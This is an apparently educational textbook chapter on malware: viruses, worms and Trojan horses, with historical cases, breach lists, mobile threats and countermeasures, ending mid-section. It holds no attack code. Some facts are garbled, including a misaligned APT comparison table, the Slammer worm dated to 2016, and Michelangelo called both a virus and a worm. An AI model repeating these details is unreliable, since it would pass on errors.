Final Project
3 Threat Factors—Computers as Targets
Learning Objectives
- Differentiate between viruses, worms, and Trojan horses.
- Explain the threat viruses pose to computers and computer users.
- Explain the threat worms pose to computers and computer users.
- Explain the threat Trojan horses pose to computers and computer users.
- Describe countermeasures to threats that target computers and mobile devices.
Cyberattacks are cheap and unconstrained by geography and distance to the target. Let’s compare a bank robbery with the ransomware attack on a bank. The goal of the attackers is the same: get money from the bank and get away without leaving evidence. A bank robber has to stake out the bank, learn about the employees’ behavior, learn about when money is taken to the bank and picked up from the bank, and whether the bank has a security guard—and if so, what the routine of the guard is. A bank robber often also needs an accomplice to stay outside and check for police and/or drive the getaway car. The bank robber then has to plan the attack, carry it out without any incidents, and get away with the money. The bank robber has to stack the money in a safe but accessible place. The robber eventually starts spending the money. Very often, banks now have money that is marked, which would make it easier to catch the bank robber. The whole process is very time consuming and risky. Bank robbery is a serious felony, and police will spend significant resources to catch the criminal.
Now compare the bank robbery with a ransomware attack on a bank. The attacker does not need help from others. All that is needed is a computer and network connection. The cyberthief hacks into the bank and encrypts the data. The bank now cannot operate its business because they can’t access their data, including customer accounts. The cyberthief sends a message to the bank manger telling him or her that if the bank wants their data decrypted they must pay a ransom of $100,000 in bitcoins (a digital currency untraceable by law enforcement). If the bank refuses to pay, the data will stay encrypted. Typically, the cyberthief sets a deadline to put pressure on the victim. The bank can try to decrypt their own data by hiring experts or with the help of law enforcement, but that may not be possible. The cyberthief simply has to wait. He or she does not have to be physically present or even near the bank and could be in a different country. There is also little risk of detection because there are usually no traces. Attribution of the attack—that is, finding the person who committed the attack—is very difficult and even in major attacks often not possible with certainty. For instance, even though the U.S. government believes that Russia hacked the Democratic Party during the 2016 election campaign and possibly interfered with the election, there is no hard evidence linking Russia to the security breaches. Thus, in a ransomware attack it is highly unlikely that the attacker will get caught. These differences between a traditional bank robbery and a cyberattack on a bank demonstrate why cybercrime has drastically increased and will likely continue to increase. They also demonstrate the difficulty cybersecurity specialists in the government and private industry face when dealing with cybercrime.
Case Study 3.1: The Top 10 Data Breaches1
- Yahoo—2014
The hackers stole information from 500 million account holders.
- FriendFinder Network—2016
FriendFinder is the mother company of about 49,000 dating websites. In 2016, data from 412 million users was breached going back as far as 20 years.
- MySpace—2016
The company “lost” 360 million user passwords.
- Experian—2012
More than 200 million Social Security numbers were breached after the credit reporting company acquired the data firm Court Ventures.
- USA Voter Database—2015
Voter information from 191 million people dating back to 1990 was stolen.
- LinkedIn—2012
In 2016, LinkedIn admitted that 165 million accounts had been breached.
- Nasdaq Stock Exchange—2012
Attackers stole more than 160 million credit and debit card numbers.
- eBay—2014
Fraudsters gained access to 145 million user accounts.
- Heartland Payment System—2009
Magnetic strip information from 100 million credit cards was stolen.
- VK—2016
The Russian version of Facebook was breached and 100 million accounts were breached.
What Do You Think?
- Think about what user information each of these companies hold. What are the negative consequences for the victims of the data breach for the different companies?
The Evolution of Cybercrime
Phases of Convergence
There are three phases of convergence in the evolution of cybercrime. In Phase 1 of convergence, technology is separate from people. It’s also referred to as sneakerware because people had to physically take a floppy disk or other external hard drive and walk to a computer to transfer a malware onto the computer. The first Macintosh virus, Elk Cloner, was part of a video game for computers inserted via a floppy disk.
In Phase 2 of convergence, man is leveraging technology—that is, man is using technology. In this phase, fraudsters developed the first e-mail-born viruses, such as the ILOVEYOU and the Melissa virus, which spread via e-mail attachment. Everyone who opened the attachment infected their computer.
In Phase 3 of convergence, technology replaces people. The first malware that fell into this phase was Code Red discovered in 2001. Code Red attacked Microsoft computer systems and spread to other systems by using HTTP requests. The Code Red worm does not respond to the owner’s commands, but rather it operates independently by creating a backdoor into the operating system of the computer. The computer owner does not know what the worm will do with the computer. The original Code Red initiated a denial-of-service (DoS) attack on the White House. All machines infected with the Code Red virus started to send requests to the White House web server at the same time, overwhelming the server. People who had computers infected with Code Red not only had an infected machine but they were potentially also suspected of committing a crime (i.e., the DoS attack) on the White House.2
Phase 3 of convergence was also the beginning of the era of cyberspying. People do not have to be physically present in one country to spy out information on computers in another country; instead, they can infiltrate computers and steal information by using computer programs such as Trojan horses. This chapter discusses viruses, worms, and Trojan horses in detail and provides examples for each.
Reference Report: CIA Report on Russian Hacking of Democratic Party
https://www.intelligence.senategov/sites/default/files/documents/ICA_2017_01.pdf
Main Targets in Information Technology
Cybercrimes are a growing problem in need of new solutions. A whopping 74% of businesses are expected to be successfully hacked in 2017. By 2020, the economic cost of cybercrime is expected to go above $3 trillion. Increasingly, nation-states are committing the attacks, which results in more sophisticated attacks and attacks on important infrastructures.6 There are three main targets in information technology: software, hardware, and the network. Table 3.1 provides some examples of the vulnerabilities of software, hardware, and networks. Throughout this book we explain these vulnerabilities and countermeasures in detail.
Think About It 3.1: Russian Cyberspies and the 2016 Presidential Election
U.S. intelligence agencies seem to agree that Russia’s President Vladimir Putin and state-sponsored hackers were involved in hacking incidents against the Democratic Party in late 2016 during the presidential election. A report by the Office of the Director of National Intelligence from January 2017 states that the evidence strongly implicates Russia as the origin country of the hackers and cyberspies.3 Another report released by the FBI in December 2016 also concludes that Russia interfered with the election process by stealing and releasing classified information, including confidential e-mails.4
Just like the Russians infiltrated the computers of the Democratic Party, the FBI and CIA also had to get their information from insiders or by spying on the Russians. Russia believes that the insider information came from one of their agencies. In January 2017, Sergei Mikhailov, the head of Russia’s Federal Security Service, was arrested for treason for passing information about Russian hacking to the CIA.5
What Would You Do?
- How has the Internet changed the ability of political espionage?
- Read the CIA Report on the Russian Hacking of the Democratic Party. What evidence does the report present?
Table 3.1 Vulnerabilities of Software, Hardware, and Networks
Table 3.1 Vulnerabilities of Software, Hardware, and Networks | |||
Software | Hardware | Network | |
Attacks | • Infected download links of software or software updates
• Malicious apps • Drive-by downloads |
• Manufacturing backdoors
• Backdoor creation • Access to protected memory • Hardware modification • Inducing faults • Counterfeiting products |
• Denial-of-Service Attacks
• The Man in the Middle • Browser • Brute Force • SSL • Scan • Domain Name Servers • Backdoor7 |
Devices | • Computers
• Computer networks • Smart devices |
• Access control systems
• Network appliances • Industrial control systems • Surveillance systems • Components of communication infrastructure |
• Computers
• Modem • Router |
Countermeasures | • Anti-virus software
• Security patches • Data backup • Software screening |
• Tightly control production
• Use detection measures to discover compromised hardware8 |
• Network-based mitigation
• Host-based mitigation • Proactive measures9 |
Cybersecurity is concerned with three main issues: (1) confidentiality of the data, (2) integrity of the data, and (3) availability of the data. Confidentiality refers to keeping private information private. This includes classified government documents, such as the engineering of the latest fighter planes, but also trade secrets and patents, such as wind turbines. If other governments or companies can steal such data, they could also build such fighter planes and develop defense systems. Integrity of the data means that the data are correct. If criminals can manipulate data, people can be injured or killed. For instance, if cybercriminals could manipulate the software that runs a power plant, the power plant could stop working or blow up, causing power outages and injury or death to the workers. Availability means that persons who need access to the system actually have access at all times. If there were an attack on the power plant, people might be able to stop a disaster if they continue to have access to the system. But if they are unable to access and control the system, they would have no opportunity to stop the attack.10
These main components of cybersecurity—confidentiality, integrity, and availability—are the main targets of cybercriminals. They try to steal confidential data, manipulate data, or make data unavailable. The tools used to accomplish these goals range from computer viruses and malware to cyberwar and cyberterrorism. Computers can be the target of cybercrimes, but they can also be a tool for cybercrimes. For instance, hackers may target a computer or computer network to gain access to data or disrupt the functioning of the computer (see Chapter 4). At the same time, computers are used as a tool by hackers to break into the network system of a company or to engage in crimes such as cyberstalking or pornography (see Chapter 4).
There are three main threat clusters: (1) technological, (2) sociopolitical, and (3) human-machine. In the technological cluster, computers are the target of the cybercrime—mainly malware, such as viruses and worms. The sociopolitical cluster includes crimes where computers are used as a tool, such as phishing or identity theft. The human-machine cluster focuses on computer infrastructure and vulnerabilities created through our dependence on computers and networks. For instance, many people use the Internet to make money. This includes bloggers, news agencies, advertising agencies, video producers, financial planners, etc. Their ability to work depends on an open Internet environment. This open environment, of course, also aids criminals because it makes it easy to commit crimes against computers and with the help of computers.11
This chapter discusses the different types of cyberthreats against computers and countermeasures to these cyberthreats. The following chapter continues the threat analysis by focusing on computers as a tool to commit cybercrimes.
Computers as a Target
Computers are used to execute commands, such as calculating a value, sending information to another computer, or performing whatever tasks the user needs. As a student, you instruct your computer to open a Word document, write into that document, save the document, and send it to your professor. Some software that runs on your computer may disrupt its performance. Imagine you are trying to open the paper you started writing the day before but all you get is an encrypted, unreadable Word document. It’s possible that you downloaded malicious software (malware) that encrypted your computer and makes it impossible for you to access your documents. The term malware combines the words malicious and software. A malware is a computer program or piece of software written by someone with a malicious or criminal intent. It is a code written to destroy, disrupt, or steal data, or do other damage to a computer or network. Malware fulfills two main functions: spread itself and cause damage. Malware typically spreads itself via e-mail attachments embedded in web pages, file sharing, infected CDs or DVDs, or by scanning a computer or network for exploitable vulnerabilities. For instance, a user may click on a web page link to download software needed to run a specific program, such as Adobe Flash. That link to Adobe Flash may contain a malware that infects the computer. The damage that such malware can cause ranges from trivial to very serious. Trivial damage may be a message that pops up on the screen every time the user starts the computer. But the damage can also be debilitating by destroying files, taking the computer hostage, or stealing data and passwords to facilitate other crimes, such as identity theft. One of the most common damages is using the computer as a slave to send spam to other computers, to host illegal data, to attack other computers, or to extort others. Not all malware will become active right away. Some malware can be activated remotely or is programmed to activate after a certain amount of time so that it can spread without being noticed right away.12
Threats to Mobile Devices
Whereas malware has traditionally targeted computers and computer networks, the lightning-speed spread of mobile devices has become a new and fruitful market for malicious code developers. Similar to computers, mobile devices are vulnerable to all sorts of malware, including viruses, worms, and Trojan horses. There are five main reasons for the increase in threats to mobile devices.13 First, the increase in smartphones has led to a significant drop in the prices users pay and a substantial increase in the number of smartphones people own. In addition to smartphones, there has also been a growth in the health tracker industry, and devices such as Fitbit or Garmin Vivofit have become very popular. Even smartwatches are no rarity: Pebble, Apple Watch, and Samsung GearS2 may be the most popular models. In addition to smartphones, smartwatches, and health trackers, many people also have a tablet, such as a Kindle or an iPad. All of these devices can communicate via Wi-Fi and Bluetooth. Their ability to communicate with each other is of great convenience for the users and also for criminals who are trying to steal data, hijack a mobile device, or manipulate the device in other ways. For instance, if a criminal infects one device with a malware, the infection may spread to the other devices and other people’s devices.
Second, malware intrusion has mainly concentrated on Android devices due to their open-source technology. Androids’ open-source technology is based on Linux kernel and developed by Google. This open-source technology enables developers to freely create and add applications, features, and updates. Unfortunately, this also enables criminals to distribute malicious applications and updates. Since there are no centralized updates, Android devices are not regularly updated with security software and are therefore highly vulnerable to malware intrusions.
Third, smartphone users are storing much information on their devices, including financial information, credit card numbers, user names and passwords, pictures, etc. Many people use the app “Wallet,” which enables them to pay with the phone. Others use a personal finance or budgeting app such as “Mint” where they record all of their expenses and income. For criminals, this is easy-to-steal information, which can then be used for financial gain, identity theft, and to spread the malware to other devices.
Fourth, smartphone hardware has become increasingly sophisticated, and so has the capability of smartphone operating systems. These increased capabilities are helpful for developers of applications and make smartphones much more useful for customers, but malware writers also profit from this opportunity. They can develop more sophisticated malware and infiltrate a smart device without the owner ever noticing.
Finally, programming software for smartphones is similar to that of PCs. Malware developers can simply transfer from the PC environment to the smartphone.14
There are many different forms of malware, and each has its own way to behave, be triggered, and spread.15 This chapter focuses on three main forms of malware threats: computer viruses, Trojan horses, and worms. All three have in common that they are used to disrupt computer networks or create advanced persistent threats. As the following case study shows, even sophisticated companies are vulnerable to a malware attack. These threats posed by viruses, worms, and Trojan horses are discussed in more detail in following sections.
Case Study 3.2: Democratic Election Campaign—Hackers Steal Campaign Information
For over a year, hackers attacked political entities that supported the democratic election campaign. An official said, “If they wanted to get into a system, they got into the system.” A private investigator who had been hired by the campaign found several data breaches, some of which had substantial negative consequences for the campaign.16
The most detrimental attack was the hacking of the Democratic National Committee (DNC), where the hacker Guccifer 2.0 stole nearly 20,000 e-mails, including private e-mails. The e-mails and other information, such as financial contributions, were then fed to WikiLeaks, which published them on July 22, 2016. The e-mails stem from seven members of the DNC, including communications directors, finance directors, and key senior advisers covering a period of January 2015 until May 2016. WikiLeaks provided a searchable database of these e-mails, and information from the e-mails quickly became public.17
The e-mails revealed that the DNC chairwoman, Debbie Wasserman Schultz, had exchanged e-mails with a variety of people and entities in an effort to discredit Bernie Sanders and help Hillary Clinton win the Democratic Party endorsement. The DNC is supposed to be a neutral entity supporting each candidate equally and without bias. As a consequence of the leaked e-mails, Debbie Wasserman Schultz resigned from her position and the DNC issued an apology to Bernie Sanders, who had been disadvantaged in the preliminary elections.18
A few days later, investigators of the Democrats found that hackers had hacked into the analytics data program and stole data about voters. The hackers had access to the data for approximately 5 days. The Clinton campaign stated that no personal voter information was stolen and that the hackers did not get into the internal campaign servers, which are independent from the analytics data program.19
What Do You Think?
- Discuss the possible motives of the hackers.
- Do you believe that all e-mails of all election campaigns (Republicans and Democrats) should be public so that the voters have full knowledge, or should these e-mails remain secret? Discuss pros and cons.
- Discuss whether leaked e-mails from your private account could damage your own reputation. How can you protect the privacy of your e-mails?
Viruses, Worms, and Trojan Horses
Viruses
A virus is a “small software program designed to spread from one computer to another and to interfere with computer operation.”20 A virus is a code that will duplicate itself into a host program when it is activated. Every company has at least one employee who will click on anything and open any file he or she receives. Not surprisingly, hackers are well aware of that, and so 90% of all cyber intrusions start with a phishing e-mail.21 Virus files are typically executable files—that is, a file that the computer directly executes. They typically end in .exe. This may be a hidden extension, however, to prevent users from becoming suspicious. Users cannot read executable files. Once the user opens or runs the program, the virus spreads further and infects other programs or the entire computer. Imagine you downloaded a music file from the Internet that was infected with a virus aiming to disable your Excel files. When you run your Excel program, the virus is activated and starts to destroy your Excel files.
Image 3.1 Computer Virus
©iStockphoto.com/joxxxxjo
One of the first to experiment with computer viruses was Fred Cohen, who developed self-replicating miniprograms in the 1980s and warned early about the risks associated with these programs. Cohen compared computer viruses to a disease:
As an analogy to a computer virus, consider a biological disease that is 100% infectious, spreads whenever animals communicate, kills all infected animals instantly at a given moment, and has no detectable side effects until that moment. . . . If a computer virus of this type could spread throughout the computers of the world, it would . . . wreak havoc on modern government, financial, business, and academic institutions.22
Cohen was able to show that viruses can attach themselves to other programs and cause denial of services (i.e., interrupting service or making a program unusable). He defined a virus as “a program that can infect other programs by modifying them to include a possibly evolved copy of itself.”23 Programs that are infected by a virus can then also spread the virus. Cohen also was one of the first to write about the dangers of the lack of security systems by companies, institutions, and individual users. At the time, very few institutions were aware of the real threat, and there was no system that could have stopped a virus.24Even though the development of antivirus programs also began in 1987 with Bernd Fix, the real advances didn’t start until 1991 with Norton Antivirus. At that time, viruses developed much faster and were well ahead of antivirus programs. Since 1987, antivirus programs have been making significant progress, but they continue to trail the development of new viruses by cybercriminals.25
There are three main types of viruses: (1) shell viruses, (2) add-on viruses, and (3) intrusive viruses. Shell viruses form a shell around the original code and the original host program with the purpose to take over the functions of the host program. Add-on viruses attach to the original code, changing the startup information of the program. The viral code then executes before the original code, interfering with the program that the user attempts to run. Intrusive viruses overwrite the original code, which can make the host program dysfunctional.26
One of the most destructive viruses in the United States was the “ILOVEYOU” virus, which caused damages of about $10 million. The virus was attached to an e-mail with the subject line “ILoveYou” and fooled users around the globe. The e-mail said, “Kindly check the attached LOVELETTER coming from me,” and had an attachment named “Love-Letter-For-You.txt.vbs.” The .vbs extension was hidden so that the users only saw a text file. Users who opened the attachment activated the .vbs file (virus) and the virus then sent itself to all contacts in the users’ Outlook address book. According to estimates, the virus affected over 15 million computers within 10 days. This is about 10% of all computers connected to the Internet worldwide. The ILOVEYOU virus was a simple virus in that it did not attempt to hide. It was very obvious to the users that something was wrong with their computer.27
Since then, viruses have evolved and become more sophisticated. Viruses are now able to operate in stealth to avoid detection. This is called an advanced persistent threat (APT). APTs are “cyber attacks executed by sophisticated and well-resourced adversaries targeting specific information in high-profile companies and governments, usually in a long term campaign involving different steps.” Originally, APT only referred to cyber intrusions against military units, but APTs are now targeting a wide range of industries and governments. APTs can be distinguished from traditional threats by their characteristics. Table 3.2 shows the differences between traditional attacks and APT attacks.28
Table 3.2 Traditional Attacks Versus APT Attacks
Table 3.2 Traditional Attacks Versus APT Attacks | ||
Traditional Attacks | APT Attacks | |
Attacker | Single hackers or a loose community of hackers | Highly targeted attacks with a clear objective |
Target | Typically individual computers or devices, nonspecific | Skilled and highly organized and resourced hackers |
Purpose | Profit, fame, challenge | A long-term campaign with persistent attacks |
Approach | Single run, mostly easy to detect | Stealthy and evasive attack techniques that can stay undetected |
Source: Chen P., Desmet L., Huygens C. (2014) A Study on Advanced Persistent Threats. In: De Decker B., Zúquete A. (eds) Communications and Multimedia Security. CMS 2014. Lecture Notes in Computer Science, vol 8735. Springer, Berlin, Heidelberg.
An example of an APT is an attack by one of the most advanced Chinese cyberhackers called “Deep Panda.” Deep Panda targets government officials, defense contractors, think tanks, and financial institutions with the goal to gather sensitive information. The hackers use the Windows PowerShell scripts to intrude the computer systems. For the administrator, it often goes unnoticed because the scripts that include the malware look like scheduled tasks that are performed routinely. Once executed, the malware is installed without leaving any artifacts.29 According to news agencies, an attack on the U.S. Office of Personnel Management computers compromised the information of 4 million current and former employees of the federal government. For several months, the hackers copied several gigabytes of data undetected. Even after the Cyber Incident Response Team found the intrusion, it took them 2 months to lock the intruders out of the system. The response team stated that the hackers are continuing to try to get back into the system.30 Both traditional and APT attacks pose five main risks for private computer users, companies, and government entities: (1) disable computers and mobile devices, (2) send spam, (3) provide access to computers, (4) steal personal information, and (5) hijack the user’s web browser.31
Risks Created by Viruses
- Disable computers and mobile devices
Some viruses can cause the computer or mobile device to stop functioning properly. Disabling devices carries great risks for companies and people. These devices may disable alarm systems in people’s homes or businesses, or they can disable the defense network of the government and the military. One such incident occurred in 2008 when a virus disabled the defense network of the Department of Defense (DoD). The virus was transferred to a DoD computer via an infected USB flash drive brought in from the outside by an authorized user. The virus invaded classified and unclassified networks and gave control of the computer system to the author of the virus. It took 14 months and $1 billion to recover from the attack, and the true extent of the compromise remains unknown.32
- Send spam
Viruses are often capable of accessing the address book of the infected computer or mobile device and sending spam messages with itself attached to friends, family, and colleagues of the victim. If these users opened the attachment in the belief it came from a friend, they infected their own computer or mobile device. This is also a common scheme through Facebook. Users may receive an e-mail from a “friend” with a picture or video attached and are asked to open the file. The file contains a virus, and the e-mail did not come from their Facebook friend.
- Provide access to computers
Viruses may be written with the purpose to give the malicious writer control over the computer or mobile device. Control over the device can serve the purpose of stealing data, controlling certain functions of the computer, or manipulating files on the computer, such as encrypting files or changing the security settings. If an outside person changes the security setting, the owner of the device may be locked out. Imagine a hospital being locked out of their computer system. Without access to medical records, patients cannot receive treatment.
- Steal personal information
Criminals often target computers to gain information they can use to steal someone’s identity, steal his or her money, or get information from the computer that would help them make money. For instance, a criminal may try to get information about stocks before the market opens to make certain bids that will be financially beneficial. This type of trading is illegal, of course.
- Hijack the user’s web browser
Viruses can also hijack a computer’s web browser. By default, the devices download messages without users having to open the message and initiating the download. Users can prevent this problem by disabling automatic downloads of text messages and e-mails. The person controlling the computer or mobile device can push automatic messages to the victim or users found in the device’s address book.33
Risks to Mobile Devices
As discussed above, the risks created by viruses are not only risks to computers or networks but also to other electronic devices, such as smartphones, drones, home security cameras, baby monitors, and other devices that use Bluetooth or are connected to the Internet. Smartphones and Bluetooth devices, such as health trackers like Fitbit, have been swarming the market, and many users are constantly connected to the Internet. This technology has also become a popular target of cybercriminals who understand the opportunities to exploit device vulnerabilities. Smart devices have several vulnerabilities, including web browsing, Wi-Fi, multimedia message service (MMS), short message service (SMS), Bluetooth, applications, and e-mails. Malicious code writers have developed viruses that target mobile devices. These viruses are generally referred to as MMS viruses. Similar to computer viruses, these MMS viruses can disrupt phone service, steal information, block data, track the user’s movement, force text messages to friends and others in the address book, etc. Users may never find out that their mobile devices are infected and unwittingly spread the virus to other devices, including computers via USB or Bluetooth connection. Some researchers have warned that devices such as Fitbits could contain a virus, and if the user connects it to a company computer to charge it via USB cable, the virus could spread into the computer network of the company. Although this is currently a hypothetical scenario, it certainly presents a serious danger. Another threat that MMS viruses pose is their ability to randomly scan the phone network and contact mobile phone users who are not in the address book.34 MMS viruses can infect large numbers of smartphones. For instance, the virus “Zombie” infected over one million smartphones in China and created costs of about $300,000 per day. The virus was designed to send automatic text messages.35 See Table 3.3 for examples of types of viruses.
icture of a Ransomware Attack by Motormille2, https://commons.wikimedia.org/wiki/File:Ransomware-pic.jpg. Licensed under CC BY-SA 4.0, https://creativecommons.org/licenses/by-sa/4.0/legalcode
Table 3.3 Types of Viruses
Table 3.3 Types of Viruses | ||
Type | Example | How it works |
File Infector Virus | Jerusalem
Cascade |
Infect program files, such as .com or .exe |
Boot Sector Virus | Disk Killer Michelangelo | Infect the system area of the disk—the boot record. |
Master Boot Sector Virus | NYB
Unashamed |
Infect the system area of the disk—the boot record.
But the location of the viral code is different. Typically saves a legitimate copy of the master book sector in a different location. |
Multipartile Virus | Anthrax
Tequila |
Infect boot records and program files. |
Macro Virus | Melissa
NiceDay |
Infect data files. |
Source: Based on information from Symantec.com. What is the difference between viruses, worms, and Trojan horses? (n.d.). Retrieved from https://support.symantec.com/en_US/article.TECH98539.html.
Case Study 3.3: The First Viruses
Elk Cloner: The First Apple Virus
The first virus reported on an Apple computer was called the Elk Cloner. Created in 1982 by 15-year old Richard Skrenta, the Elk Cloner was developed for the Apple II operating system and stored on a floppy disk. When the user inserted an infected floppy disk, the virus would become resident on the computer and spread by infecting other floppy disks used on that computer. The virus did not cause any actual damage, but rather it caused users to see a message on the screen every 50th time they started their computer. The message was:
Elk Cloner: the program with a personality. It will get on all your disks. It will infiltrate your chips. Yes it’s Cloner! It will stick to you like glue. It will modify ram too. Send to the Cloner!36
Brain: The First PC Virus
In 1986, brothers Basit Farooq Alvi and Amjad Farooq Alvi developed the first computer virus for PCs running MS-DOS. The virus was called “Brain.” The Brain changes the boot sector of a storage media, such as a floppy disk, and when the computer boots, the virus infects the computer. At the time, floppy disks were used to start up a computer. Thus, a virus on a floppy disk was a sure way to infect the computer, and once the virus was on the computer, it stayed in its memory and infected newly inserted floppy disks. The Brain virus was mainly a nuisance because it caused work to be lost and sent perplexing messages to the users of infected computers. These boot sector viruses disappeared when floppy disks were no longer used to start up a computer.37
Worms
In his 1975 science fiction novel The Shockwave Rider, John Brunner was the first to use the term worm, calling it tapeworm. In his novel, Brunner describes a computer-dominated world in which the hero, Nick, creates a tapeworm with an intent to destroy all secrecy by the government. Brunner introduces the worm as a “continental net, a self-perpetuating tapeworm.” This was the first time the idea of using a tool to manipulate information in a computer network was used. This was long before the actual Internet developed. The term worm was later adopted by computer experts and defined very similar to Brunner’s definition.38
A worm “is a self-replicating virus that does not alter files but resides in active memory and duplicates itself.”39 Worms live and replicate within the operating system that is invisible to the computer user. Users typically encounter the worms when their computer starts to slow down substantially due to the resources taken up by the worm during self-replication.
Whereas viruses need some form of intervention from the computer user, such as opening an e-mail attachment or link, worms can spread without the help of the user. Worms also do not need a host program to spread. Worms exploit system vulnerabilities (i.e., weaknesses or flaws in the computer operating system or management of the system) to intrude a computer or network. Once the worm is inside the computer, it replicates and causes damage similar to viruses, such as destroying or stealing data, sending e-mails to other computers by using the address book, and infecting other computers. Worms replicate via network connections.40
Legal Issue 3.1: The Morris Worm
The inventor of the first real computer worm was Cornell graduate student Robert Tappan Morris, the son of then-head researcher of the National Security Agency (NSA), Robert H. Morris. Around 6 p.m. on November 2, 1988, Morris released the first worm into a Unix-based computer system that was part of the research network (i.e., early Internet). The Internet had come under attack for the first time. The worm fulfilled two main functions: (1) infect as many computers as possible and (2) be difficult to discover and stop. Within 12 hours, the worm overwhelmed approximately 6,000 computers, reducing their functionality substantially. At the time, this was 10% of all computers on the network. The Morris worm created much confusion and consternation within the community of researchers and the military because the military computers were also connected to this network. By Wednesday night, researchers at the University of California–Berkeley and Massachusetts Institute of Technology had managed to copy the worm and started to analyze it in an attempt to stop it. Morris, who had not intended to cause that much damage and panic, put an anonymous post on the network outlining how to stop the worm from spreading. Unfortunately, the network was so overloaded at that point that few people actually received the message. By Thursday morning, some researchers also started to post information on how to stop the worm. This incident demonstrated for the first time the vulnerability of the network and laid the groundwork for cybersecurity. In the aftermath of the Morris worm, the National Computer Security Center held a workshop on the exploitation of the Internet and produced a report that detailed how the program worked and fixes to the vulnerabilities of the Unix system.
Morris was charged with having violated the Computer Fraud and Abuse Act of 1984 and received probation. Morris argued that he was only experimenting with worms and had no intention of actually causing harm.41
What Do You Think?
- Do you believe that Morris had the intent to commit a crime by distributing the worm? If you were his defense attorney, what would you argue? If you were the prosecutor, what would you argue?
- Some people argue that hackers like Morris should be rewarded for demonstrating the vulnerabilities of computer systems. What do you think?
Removing a worm from an infected computer is very difficult because the worm is intertwined with the system. If antivirus or antimalware software does not remove the worm, users may have to do a clean install of the operating system.42
Similar to viruses, worms are not only a threat to computers but also to Bluetooth devices such as mobile phones, health trackers, wireless surveillance cameras, connected-drive cars, and similar devices. Research suggests that Bluetooth worms spread quickly to other devices.43 The first mobile worm, called Cabir, was discovered in 2004 and infected Nokia devices via unsecured Bluetooth connections during the 2005 10th World Athletic Championships in Helsinki. Cabir accessed the contacts in the user’s phone and sent itself to other users.44
Worms create several risks to computers and mobile devices, including (1) risks to the integrity of the computer system, (2) risks to maintaining confidentiality of information on the computer, (3) risks to the availability of computer files, and (4) Internet slowdown.45 Table 3.4 provides a list of the five most destructive worms.
Table 3.4 The Five Most Destructive Worms
Table 3.4 The Five Most Destructive Worms | |||
Worm | Year Released | Origin | Damage |
Mydoom | 2004 | Russia | $38 billion |
Sobig | 2003 | United States | Crashed internet gateways and e-mail servers
$37 billion |
ILOVE YOU | 2000 | Philippines | 10% of the World’s PCs
$15 billion |
Conficker | 2007 | Ukraine | Infected millions of PCs
$9.1 billion |
Sasser | 2004 | Germany | Infected critical infrastructures
$18 billion |
Source: Based on information from wildammo.com. (n.d.). 10 most destructive computer worms and viruses ever. Retrieved from http://wildammo.com/2010/10/12/10-most-destructive-computer-worms-and-viruses-ever/.
Risks Created by Worms
- Integrity of the computer system
Some worms will cause the pop up of messages such as “I think (user’s name) is a big, stupid jerk!” This worm was called the WM/97 Jerk worm. After the message was displayed, users could continue to work. Other worms may not only show a message but also lock the computer when the message disappears.
- Confidentiality of information on the computer
The user should be the only one who has access to the computer and information stored on the computer. Some worms breach this confidentiality. For instance, the Koobface worm infected computers of users who clicked on a link to update their Adobe Flash. Once inside the operating system, the Koobface worm started to send advertisements for software and recorded the clicks of the user and web searches, which were then sold to the malicious authors of the Koobface worm. This type of worm is also used by criminals who engage in identity theft to steal passwords, credit card numbers, or tax returns.
- Availability of computer files
Worms can interfere with users’ access to their files by making files unavailable, damaging files, or slowing down the computer. For instance, the Michelangelo worm upon activation began damaging computer files by overwriting the information in these files.
- Internet slowdown
In January of 2016, the Slammer worm caused network interruptions across the United States, Asia, and Russia. The worm also infected the network of news provider ABC and caused hundreds of cash machines of the Bank of America to be unavailable. The Slammer further disabled websites of major credit card companies and shut down more than 900 systems in the DoD. Worms such as the Slammer can have very serious impacts on network systems and national security.46
Trojan Horses
A Trojan horse is a malware that is “disguised as, or embedded within, legitimate software. It is an executable file that will install itself and run automatically once it is downloaded.”47 Stated differently, a Trojan horse is a program that poses as a legitimate program but performs unknown or unwanted functions. The term Trojan horse stems from the Greek Trojan horse that carried an army inside its body. It was used by the Greeks to invade the city of Troy. The Greeks presented a Trojan horse as a present to the city. When Trojan soldiers pulled the horse inside the city gates, it provided the Greeks with an opportunity to destroy the city. The Greek army waited inside the horse until it was dark and then struck down Troy’s army in a surprise attack. Similarly, Trojan horses are typically used as delivery systems for crimeware such as keystroke-capturing software. This software can then be used to monitor what people type, especially passwords and user names. Social engineering is the most common way to infect a computer. Social engineering is fooling someone into giving out personal information. Once the user has activated the Trojan, the malware can delete, block, modify, or copy data from the computer. A Trojan horse may also disrupt the performance of the computer or network. Unlike viruses and worms, Trojans are not capable of self-replication.48
The first Trojan for Android mobile devices was discovered by Kaspersky Lab in 2010. The Trojan was named Trojan-SMS.AndroidOS.FakePlayer.a because it masqueraded as a media player application. Since 2010, there has been a rapid increase in the development of mobile Trojans especially targeting open-source devices.49
Trojan horses create five main risks for computers and mobile devices: (1) deleting files, (2) using the computer to infect other computers, (3) watching users through the webcam, (4) logging keystrokes, and (5) recording user names, passwords, and other personal information.50 See Table 3.5 for a list of the types of Trojan horses.
Table 3.5 Types of Trojan Horses
Table 3.5 Types of Trojan Horses | ||
Trojan Horse | Damage | Type |
NVP | Modified the system file of Macintosh computers so that all typed vowels disappeared. | Joke Trojan |
Feliz | Displayed image warning users not to run any programs. | Joke Trojan |
AOL4Free | Claimed to give users free access to AOL and then wiped out every file from the infected hard drive. | Joke Trojan |
ProMail | Claimed to be a freeware e-mail program and then stole user data. | Data Theft Trojan |
SubSeven | Deletes, modifies, and copies files. Steals information. | Remote Access Trojan |
Back Orifice | Accessing personal computer files. | Remote Access Trojan |
Source: Based on information from etutorials.com. Types of Trojan Horses. (n.d.). Retrieved from http://etutorials.org/Misc/computer+book/Part+2+Dangerous+Threats+on+the+Internet/Chapter+8+Trojan+Horses-+Beware+of+Geeks+Bearing+Gifts/TYPES+OF+TROJAN+HORSES/.
Risks Created by Trojan Horses
- Deleting files
One of the main problems with Trojan horses is that files are deleted or corrupted in another way. This, of course, is not only inconvenient but can cause great problems if it affects work files that can’t be recovered.
- Using your computer to infect other computers
